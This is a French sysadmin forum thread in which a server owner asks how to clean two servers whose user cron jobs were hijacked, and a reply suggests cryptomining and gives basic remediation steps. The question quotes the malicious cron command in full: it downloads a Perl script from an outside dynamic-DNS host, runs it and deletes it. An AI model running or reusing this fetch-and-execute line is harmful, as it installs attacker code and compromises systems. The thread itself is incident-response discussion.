1 votes

Puis-je nettoyer ces deux serveurs piratés sans les réinstaller ?

J'ai deux serveurs dédiés qui ont commencé à m'envoyer des notifications il y a quelques jours sur des tâches cron inconnues en cours d'exécution.

Sur les deux serveurs, j'ai des comptes secondaires pour mes sites Web et le pirate a modifié la tâche cron pour ces comptes, pas pour root. Donc je pense « peut-être » qu'ils n'ont qu'un accès limité.

Tous deux essaient d'exécuter ce qui suit : cd /tmp;wget http://fastfoodz.dlinkddns.com/abc.txt;curl -O http://fastfoodz.dlinkddns.com/abc.txt;perl abc.txt;rm -f abc*

Sortie de la tâche cron du premier serveur :
http://pastebin.com/m56ga6pp

Sortie de la tâche cron du deuxième serveur :
http://pastebin.com/4utZ8agC

La chose étrange est que les deux serveurs semblent avoir été piratés en même temps et en utilisant la même méthode.

Est-ce que quelqu'un a exactement ce genre de piratage qui peut me donner des idées sur comment il est entré et si je peux le supprimer sans réinstaller..?

Il y a beaucoup de sites Web sur les serveurs, et le premier utilise environ 500 Go ce qui prendrait du temps à déplacer ailleurs et à réinstaller.

Merci d'avance!

1voto

Grokodile Points 1518

En regardant la sortie du pastebin, il semble que les tâches cron essaient de générer des hachages. Je soupçonnerais que la personne essaie d'utiliser le serveur comme partie d'un pool de minage pour une crypto-monnaie.

Pour obtenir des détails sur la façon dont il est entré, nous aurions besoin de divers journaux et êtes-vous sûr à 100% que ce n'est pas le propriétaire du site web qui l'a fait? Vous pouvez facilement supprimer la tâche cron avec.
crontab -e

Pour empêcher la personne de revenir, je désactiverais l'accès shell pour l'utilisateur spécifique s'il n'y a aucune raison pour qu'il l'ait.
chsh -s /sbin/nologin {username}

0 votes

Merci pour la réponse, je suis le seul propriétaire du serveur, et l'accès au shell est utilisé pour mettre à jour ce site avec svn et configurer certaines tâches en tant que tâches cron.

SistemesEz.com

SystemesEZ est une communauté de sysadmins où vous pouvez résoudre vos problèmes et vos doutes. Vous pouvez consulter les questions des autres sysadmins, poser vos propres questions ou résoudre celles des autres.

Powered by:

X